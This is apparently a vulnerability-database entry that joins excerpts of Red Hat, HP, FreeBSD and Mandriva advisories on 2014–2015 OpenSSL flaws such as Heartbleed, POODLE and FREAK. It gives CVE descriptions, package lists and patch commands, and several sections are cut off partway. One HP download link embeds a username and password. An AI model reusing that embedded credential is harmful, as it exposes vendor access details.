openssl-devel-1.0.1e-30.el6_6.5.s390.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64:
openssl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-static-1.0.1e-34.el7_0.7.s390.rpm
openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3571
https://access.redhat.com/security/cve/CVE-2014-3572
https://access.redhat.com/security/cve/CVE-2014-8275
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0205
https://access.redhat.com/security/cve/CVE-2015-0206
https://access.redhat.com/security/updates/classification/#moderate
https://www.openssl.org/news/secadv_20150108.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X
ENFobdxQdJ+gVAiRe8Qf54A=
=wyAg
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
References:
CVE-2014-8275 Cryptographic Issues (CWE-310)
CVE-2014-3569 Remote Denial of Service (DoS)
CVE-2014-3570 Cryptographic Issues (CWE-310)
CVE-2014-3571 Remote Denial of Service (DoS)
CVE-2014-3572 Cryptographic Issues (CWE-310)
CVE-2015-0204 Cryptographic Issues (CWE-310)
SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The
updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber
=OPENSSL11I
HP-UX Release
HP-UX OpenSSL depot name
B.11.11 (11i v1)
OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2)
OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3)
OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant
| VAR-201501-0442 | CVE-2014-8275 | OpenSSL Encryption problem vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c. OpenSSL is prone to a local security-bypass vulnerability.
Local attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
=============================================================================
FreeBSD-SA-15:01.openssl Security Advisory
The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib
Module: openssl
Announced: 2015-01-14
Affects: All supported versions of FreeBSD.
Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)
2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)
2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)
2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)
2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)
2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)
2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)
CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572
CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.
II. [CVE-2014-3569] This does not affect
FreeBSD's default build. [CVE-2014-3570]
III. Impact
An attacker who can send a carefully crafted DTLS message can cause server
daemons that uses OpenSSL to crash, resulting a Denial of Service. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
# gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
# gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
# gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r276865
releng/8.4/ r277195
stable/9/ r276865
releng/9.3/ r277195
stable/10/ r276864
releng/10.0/ r277195
releng/10.1/ r277195
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. References
<URL:https://www.openssl.org/news/secadv_20150108.txt>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206>
The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:01.openssl.asc>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.1.1 (FreeBSD)
iQIcBAEBCgAGBQJUtuEaAAoJEO1n7NZdz2rnQCcP/A19v5HUUhjz5nMbUumRwAmB
QCxNKEy6SbAuxtIwGNYJyyxKIK3R9vTHwlgyQZVb4q8FgMHcu4yABeRfov10mO5Q
U7RkLOJyca6eqEngkrh+AFfbhqfxtccIMUQkDdegsQcqZd2Ya0VeNfjA8H0XIDoL
JSEoCifmxjv6v8ZcpugahsUOBmEWx+vyHJUSPVSv/AsLubzV3hqi4iLpzLky3/dR
4LHGzPny07NkGPVqOBU7mjTs76SzCTS2c4NIVfvbphx8UojMvREbZ8ogCMEVGBXY
fIWesi7Y6lhqbSgWj1EXyZF9NTo/Z4nr7Oh1ER5VSAfmhZAdyhEEEGQrg4Jq0VL3
DJ1Y35Up79xXmVjB14COxodI5UO+55wWnXb8r/zy/eh+wv0sHwlTz56wxo7SxAOa
xOrQj0VJ7zghLhBO7azacbVYIKpfQkJafb7XRUOqu4wt2y3/jeL+0UkWJnNMROrq
aQUB6SdGUVDwQsmodgF0rsGcQYXhaQBPu4KQo8yG8+rpqc2zewi537BJr/PWJvH0
sJ6yYcD7VGyIleVRDpxsg7uBWelnGn+AqHignbyUcic4j/N9lYlF00AVgka2TdOp
i5eZtp7m95v53S4fEX2HGwWpOv+AfCrSKQZGpvdNx+9JyD3LyOvFBxs4k0oZWa6J
6FLFZ38YkLcUIzW6I6Kc
=ztFk
-----END PGP SIGNATURE-----
.
The Montgomery ladder implementation in OpenSSL through 1.0.0l does
not ensure that certain swap operations have a constant-time behavior,
which makes it easier for local users to obtain ECDSA nonces via a
FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before
1.0.1g do not properly handle Heartbeat Extension packets, which allows
remote attackers to obtain sensitive information from process memory
via crafted packets that trigger a buffer over-read, as demonstrated
by reading private keys, related to d1_both.c and t1_lib.c, aka the
Heartbleed bug (CVE-2014-0160).
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does
not properly validate fragment lengths in DTLS ClientHello messages,
which allows remote attackers to execute arbitrary code or cause a
denial of service (buffer overflow and application crash) via a long
non-initial fragment (CVE-2014-0195).
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g,
when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a
buffer pointer during certain recursive calls, which allows remote
attackers to cause a denial of service (NULL pointer dereference
and application crash) via vectors that trigger an alert condition
(CVE-2014-0198).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
1.0.1h does not properly restrict processing of ChangeCipherSpec
messages, which allows man-in-the-middle attackers to trigger use of a
zero-length master key in certain OpenSSL-to-OpenSSL communications,
and consequently hijack sessions or obtain sensitive information,
via a crafted TLS handshake, aka the CCS Injection vulnerability
(CVE-2014-0224).
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when
an anonymous ECDH cipher suite is used, allows remote attackers to
cause a denial of service (NULL pointer dereference and client crash)
by triggering a NULL certificate value (CVE-2014-3470).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
products, uses nondeterministic CBC padding, which makes it easier
for man-in-the-middle attackers to obtain cleartext data via a
padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL
0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to
use unsupported protocols, which allows remote attackers to cause a
denial of service (NULL pointer dereference and daemon crash) via
an unexpected handshake, as demonstrated by an SSLv3 handshake to
a no-ssl3 application with certain error handling. NOTE: this issue
became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote
SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger
a loss of forward secrecy by omitting the ServerKeyExchange message
(CVE-2014-3572).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before
0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL
servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate
brute-force decryption by offering a weak ephemeral RSA key in a
noncompliant role, related to the FREAK issue. NOTE: the scope of
this CVE is only client code based on OpenSSL, not EXPORT_RSA issues
associated with servers or other TLS implementations (CVE-2015-0204).
Use-after-free vulnerability in the d2i_ECPrivateKey function in
crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,
1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote
attackers to cause a denial of service (memory corruption and
application crash) or possibly have unspecified other impact via a
malformed Elliptic Curve (EC) private-key file that is improperly
handled during import (CVE-2015-0209).
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL
before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2
before 1.0.2a does not reinitialize CHOICE and ADB data structures,
which might allow attackers to cause a denial of service (invalid
write operation and memory corruption) by leveraging an application
that relies on ASN.1 structure reuse (CVE-2015-0287).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before
1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not
properly handle a lack of outer ContentInfo, which allows attackers to
cause a denial of service (NULL pointer dereference and application
crash) by leveraging an application that processes arbitrary PKCS#7
data and providing malformed data with ASN.1 encoding, related to
crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where
these security flaws has been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293
http://openssl.org/news/secadv_20150108.txt
http://openssl.org/news/secadv_20150319.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm
9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm
58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm
b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm
a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm
521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS
kz0ex6eI6hA6qSwklA2NoXY=
=GYjX
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04604357
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04604357
Version: 1
HPSBGN03299 rev.1 - HP IceWall SSO Dfw, SSO Certd, MCRP, and Federation Agent
running OpenSSL, Remote Disclosure of Information, Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-03-19
Last Updated: 2015-03-19
Potential Security Impact: Remote disclosure of information, unauthorized
access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP IceWall SSO
Dfw, SSO Certd, MCRP, and Federation Agent running OpenSSL including:
The SSL vulnerability known as "FREAK", which could be exploited remotely to
allow disclosure of information.
Other vulnerabilities which could be exploited remotely resulting in
unauthorized access.
References:
CVE-2014-3570
CVE-2014-3572
CVE-2014-8275
CVE-2015-0204
SSRT101987
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
CVE-2014-3572 and CVE-2015-0204
HP IceWall MCRP Version 2.1 and 3.0
HP IceWall SSO Dfw Version 8.0, 8.0 R1, 8.0 R2, 8.0 R3, and Version 10.0
HP IceWall SSO Certd Version 8.0R3 with DB plugin patch 2 and Version
10.0
HP IceWall Federation Agent Version 3.0
CVE-2014-3570 and CVE-2014-8275
HP IceWall MCRP v2.1, v3.0
HP IceWall SSO Dfw v8.0, v8.0 R1, v8.0 R2, v8.0 R3, and v10.0
HP IceWall SSO Agent v8.0 and v8.0 2007 Update Release 2
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP recommends the following software updates and workaround instructions to
resolve the vulnerabilities for HP IceWall SSO Dfw, SSO Certd, MCRP, and
Federation Agent. IceWall SSO Dfw 10.0 and Certd 10.0, which are running on RHEL, could
be using either the OS bundled OpenSSL library or the OpenSSL bundled with HP
IceWall. If still using the OpenSSL bundled with HP IceWall, please switch to
the OpenSSL library bundled with the OS, and then follow the instructions in
step 3.
Documents are available at the following location with instructions to
switch to the OS bundled OpenSSL library:
http://www.hp.com/jp/icewall_patchaccess
2. For IceWall SSO Dfw and Certd for SSO Dfw 8.0, 8.0 R1, 8.0 R2, 8.0 R3,
and SSO Certd 8.0 R3 with DB plugin patch 2, which bundle OpenSSL, please
download the updated OpenSSL at the following location:
http://www.hp.com/jp/icewall_patchaccess
3. For HP IceWall products running on RHEL and are using the OS bundled
OpenSSL, RHEL has provided patch or mitigation instructions at the following
location:
https://access.redhat.com/articles/1369543
Note: For RHEL6 (only) and CVE-2014-8275, please apply the RHEL6 patch
for OpenSSL from the following location:
https://access.redhat.com/security/cve/CVE-2014-8275
4. For IceWall products running on HP-UX which are using the OS bundled
OpenSSL, please apply the HP-UX OpenSSL update from the following location:
https://h20392.www2.hp.com/portal/swdepot/displayInstallInfo.do?produ
ctNumber=OPENSSL11I
WORKAROUND INSTRUCTIONS
HP recommends the following information to protect against potential risk
from CVE-2014-3572 and CVE-2015-0204 for the following HP IceWall products.
HP IceWall SSO Dfw and MCRP
- If possible, do not use the SHOST setting which allows IceWall SSO
Dfw or MCRP to use SSL/TLS protocol to back-end web servers.
- If possible, do not use EXPORT-grade ciphers on the back-end web
servers.
HP IceWall SSO Certd (version 10.0 and 8.0R3 applied DB plugin patch
release 2)
- If possible, do not use the LDAPSSL setting which allows IceWall SSO
Certd to connect to the LDAP server using SSL/TLS protocol.
- If possible, do not use EXPORT-grade ciphers on the LDAP server.
IceWall Federation Agent
- If possible, use "bindings:HTTP-POST" instead of
"bindings:HTTP-Artifact" setting in the service provider meta file. The
"bindings:HTTP-POST" setting would disable IWFA to use SSL for communicating
with IdP server.
Note: The HP IceWall product is only available in Japan.
HISTORY
Version:1 (rev.1) - 19 March 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
